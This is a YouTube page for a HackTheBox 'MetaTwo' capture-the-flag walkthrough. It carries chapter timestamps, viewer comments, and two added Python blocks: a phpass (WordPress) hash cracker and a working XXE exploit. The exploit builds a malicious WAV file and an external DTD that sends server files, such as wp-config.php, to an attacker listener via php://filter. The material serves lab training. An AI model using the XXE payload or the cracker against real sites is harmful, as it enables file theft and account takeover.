HackTheBox - MetaTwo

18,157 views

IppSec

Days ago

00:00 - Introduction
01:00 - Start of nmap, attempting to log in with FTP, then going to the website
02:45 - Running WPScan with enumerate all plugins in aggressive mode
04:00 - Taking a look at the site while WPScan runs, finding a plugin (BookingPress-Appointment-Booking) and finding an exploit
06:15 - Replacing the NONCE in the exploit to get it working
09:00 - Using SQLMap to dump everything, while we attempt to get only the data we think we are interested in
11:00 - Manually dumping the WP_USERS table with the SQL injection
13:25 - Cracking the WordPress hashes to get a user credential
16:57 - EDIT: Playing with SQLMap to get it to dump this database
23:30 - Searching for WordPress 5.6.2 exploits, discovering an XXE in WAV files
25:20 - Using the XXE to exfil files off the webserver
30:20 - Discovering FTP credentials in the WP config, logging into the FTP server and finding SSH credentials
32:40 - Logging in as JNelson and seeing PassPie, which is a CLI password manager that uses PGP/GPG keys
34:30 - Cracking the PGP/GPG key with John and getting root
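
The hashes dumped from WP_USERS (11:00) and cracked at 13:25 are phpass "portable" hashes, recognisable by the $P$ prefix. The block below is an added example, not code from the video or from WordPress: a small Python reimplementation of the phpass verify path plus a wordlist loop, so you can see exactly what hashcat (-m 400) or john (--format=phpass) compute for each candidate. KNOWN_HASH/KNOWN_PASSWORD is the reference pair from phpass' own test.php; WORDLIST is a constructed stand-in for rockyou.txt.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# phpass portable hashes, as stored in wp_users.user_pass, look like
#   $P$ B <8-char salt> <22-char hash>
# where the character after $P$ encodes log2 of the MD5 iteration count
# ('B' -> 2**13 = 8192 rounds, the WordPress default).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw: bytes) -> str:
    """phpass' own base64 variant: little-endian 6-bit groups, no padding."""
    out, i, n = [], 0, len(raw)
    while i < n:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def _crypt_private(password: bytes, setting: str) -> str:
    """Recompute a phpass hash for `password` using the prefix and salt in `setting`."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    salt = setting[4:12].encode()
    # One MD5 over salt||password, then 2**count_log2 rounds of MD5(prev||password).
    digest = hashlib.md5(salt + password).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + password).digest()
    return setting[:12] + _encode64(digest)


def hash_password(password: str, count_log2: int = 13, salt: Optional[str] = None) -> str:
    """Create a new hash; count_log2=13 ('B') matches what WordPress writes."""
    if salt is None:
        salt = _encode64(os.urandom(6))  # 6 random bytes -> 8 salt characters
    return _crypt_private(password.encode(), "$P$" + ITOA64[count_log2] + salt[:8])


def check_password(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    try:
        computed = _crypt_private(password.encode(), stored)
    except ValueError:
        return False
    return hmac.compare_digest(computed, stored)


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """What hashcat -m 400 does, minus the GPU: try each candidate in turn."""
    for candidate in wordlist:
        if check_password(candidate, stored):
            return candidate
    return None


# Reference pair from phpass' test.php ('9' -> 2**11 rounds).
KNOWN_HASH = "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"
KNOWN_PASSWORD = "test12345"

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "admin", "Winter2022!", "test12345", "letmein"]

if __name__ == "__main__":
    print(check_password(KNOWN_PASSWORD, KNOWN_HASH))  # True
    print(crack(KNOWN_HASH, WORDLIST))                 # test12345
    print(hash_password("hunter2"))                    # fresh $P$B... hash
```

Each candidate costs 8193 MD5 calls for a WordPress hash, which is why the box in the video ships the hashes off to a GPU rig rather than cracking inside the VM; the pure-Python loop above is only meant to make the algorithm visible.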

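The XXE at 23:30 to 30:20 works because the WAV metadata parser that WordPress 5.6.2 runs on uploaded audio reads the file's iXML chunk as XML with external entities enabled. The following is an added example, not the PoC used in the video: it builds a minimal RIFF/WAVE file carrying such an iXML chunk, writes the external DTD the server will fetch, and decodes what comes back on the listener. LISTENER, DTD_URL and the target path are assumptions for this example; they are not values from the box.

```python
import base64
import struct

# Assumptions for this example: your own HTTP listener, not anything from the video.
LISTENER = "http://10.10.14.5:8000"
DTD_URL = LISTENER + "/dtd.xml"


def build_xxe_wav(dtd_url: str) -> bytes:
    """Minimal RIFF/WAVE container whose only chunk is an iXML metadata chunk.

    The metadata parser reads the iXML chunk as XML; the DOCTYPE pulls in an
    external parameter-entity DTD from dtd_url, which performs the file read.
    """
    xml = (
        '<?xml version="1.0"?>'
        '<!DOCTYPE ANY [<!ENTITY % remote SYSTEM "' + dtd_url + '">'
        "%remote;%init;%trick;]>"
    ).encode()
    ixml = b"iXML" + struct.pack("<I", len(xml)) + xml
    if len(xml) % 2:  # RIFF chunk payloads are padded to an even length
        ixml += b"\x00"
    body = b"WAVE" + ixml
    return b"RIFF" + struct.pack("<I", len(body)) + body


def build_dtd(target: str, listener: str) -> str:
    """The external DTD served at dtd_url.

    php://filter base64-encodes the target so newlines and quotes survive
    inside a URL; &#x25; is a deferred '%' so the nested entity is declared
    only after %file; has already been expanded into it.
    """
    return (
        f'<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource={target}">\n'
        f'<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM \'{listener}/?p=%file;\'>">\n'
    )


def riff_chunks(wav: bytes) -> dict:
    """Walk the chunk list; a sanity check before uploading the file."""
    if wav[:4] != b"RIFF" or wav[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    chunks, off = {}, 12
    while off + 8 <= len(wav):
        cid = wav[off:off + 4].decode("ascii")
        size = struct.unpack("<I", wav[off + 4:off + 8])[0]
        chunks[cid] = wav[off + 8:off + 8 + size]
        off += 8 + size + (size % 2)  # skip the pad byte on odd sizes
    return chunks


def decode_leak(p_value: str) -> str:
    """Recover the file from the ?p= value seen in the listener's request log.

    Some listeners URL-decode '+' to ' ' and the '=' padding may be dropped;
    undo both before base64-decoding.
    """
    raw = p_value.replace(" ", "+")
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw).decode(errors="replace")


if __name__ == "__main__":
    with open("payload.wav", "wb") as f:
        f.write(build_xxe_wav(DTD_URL))
    with open("dtd.xml", "w") as f:
        # /etc/passwd as a first target; the wp-config.php path must be found on the box.
        f.write(build_dtd("/etc/passwd", LISTENER))
    print(riff_chunks(build_xxe_wav(DTD_URL)).keys())
```

Serve dtd.xml from the listener, upload payload.wav through the media library with the cracked account, and read the base64 blob out of the GET /?p=... line in the listener log. The leak travels in a URL, so for larger files prepend zlib.deflate to the filter chain (php://filter/read=zlib.deflate|convert.base64-encode/resource=...) and inflate after decoding.
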
Comments: 39
@elrich3068 1 year ago
37:33 Hackers forgetting to update their tools and companies forgetting to update their packages. Never thought I would have those two things in the same sentence :) Just joking, great video, really like the sqlmap debugging segment.
@pepemunic3661 1 year ago
like always, thanks man
@NeverGiveUpYo 1 year ago
Love your content dude
@time_to_play_007 1 year ago
That was powerful! Thanks!
@nuridincersaygili 1 year ago
Thanks for the content! When I see the foothold exploit, I expect a Python script to automate the process :)
@lonelyorphan9788 1 year ago
Ippsec rocks!!! 🙂
@mohamedtahahnichi2738 1 year ago
First❤
@DHIRAL2908 1 year ago
Couldn't we have just replaced the admin hash using the SQLi, and edited a PHP to get RCE?
@GajendraMahat 1 year ago
Does it work??
@0x1sac 1 year ago
That's a good idea, that technique is usually called "stacked queries". It is generally not possible to do this in a traditional SQL injection vulnerability on MySQL, as you are restricted by the context of the original query. If we could do stacked queries, it would probably have worked.
@kalidsherefuddin 1 year ago
Thanks
@tg7943 1 year ago
Push!
@dadamnmayne 1 year ago
would a hardcoded nonce be considered a vulnerability?
@AUBCodeII 1 year ago
Ipp, you should name a box Toy Story 4
@yuyu-ce4fz 1 year ago
Thank
@_hackwell 1 year ago
I usually don't have much success with sqlmap so I end up doing the injection manually. What's the point of having a tool which needs you to specify the method and the injection point?
@randomnickname00 1 year ago
I mean, the injection point you need to know anyway, even if you do it manually. About specifying the method, you don't really have to, but it's useful if you want to try a really specific method; working on a time-based injection can really be a pain, for example, so you can try to search for error-based injection, union, etc.
@_hackwell 1 year ago
@randomnickname00 When you provide a curl request to sqlmap, it should identify the injection point. Box creators tend to write code that fools sqlmap, so one could easily miss a vulnerability relying only on the tool, and that's what Ippsec showed in this video. Same goes with gobuster. I tend to use wfuzz instead.
@ANTGPRO 1 year ago
Automation is the point.
@_hackwell 1 year ago
@ANTGPRO Yup, exactly. No tool can replace a hacker 😁
@randomnickname00 1 year ago
@_hackwell Oh, you meant this, sorry, I thought you were talking about the endpoint, like /vulnerable.php for example.
@sams7888 1 year ago
Next, the Inject machine please
@victorkuria4734 1 year ago
Using '-p' to specify a parameter is less likely to cause sqlmap to fail than adding a * in the request.. but again, you seem to not have your tools updated xD
@bmdyy 1 year ago
First
@pranavarora250 1 year ago
How did you run hashcat so fast? I know on a VM it's slow, but it takes ages for me to run.
@magikarpslapper759 1 year ago
He's probably got it hooked up to a beefy graphics card. The difference between my CPU and my 1080 is insane.
@magikarpslapper759 1 year ago
Also I think VMs need to be configured to allow GPUs to be used. If you use a GPU with the VM, I think it can't be used for the main machine at the same time.
@gandelgerlant565 1 year ago
Exactly, you need to enable GPU pass-through to have native performance.
@flrn84791 1 year ago
He obviously doesn't run it on a VM, but on a dedicated cracking machine...
@Horstlicious 2 months ago
@flrn84791 He explained (13:18-13:37) that the kraken is another box on his local network he uses, because cracking hashes in a VM is slow.
@boogieman97 1 year ago
Hi Ippsec, how would you do a Jinja2 SSTI in an HTML email form, where the input length is max 60 characters and common characters used in an SSTI are not passing the email validation, like parentheses and square brackets, forward and back slashes? Any type of encoding / double encoding results in an internal server error.
@ammarabu5mes271 4 months ago
What is the Kraken? I am kinda lost here.
@Horstlicious 2 months ago
He explained (13:18-13:37) that the kraken is another box on his local network he uses, because cracking hashes in a VM is slow. He probably (just my assumption!) uses a GPU there.
@ayushprajapati9486 1 year ago
And this was an easy machine.
@Fbarrett 1 year ago
Yeah, sure, after you watch him do it. 😁
@flrn84791 1 year ago
This one actually is easy, just a bunch of CVEs and password cracking, nothing hard to it, and it fits the easy category for once.
@ayushprajapati9486 1 year ago
@flrn84791 Good for u.
@kalidsherefuddin 1 year ago
Thanks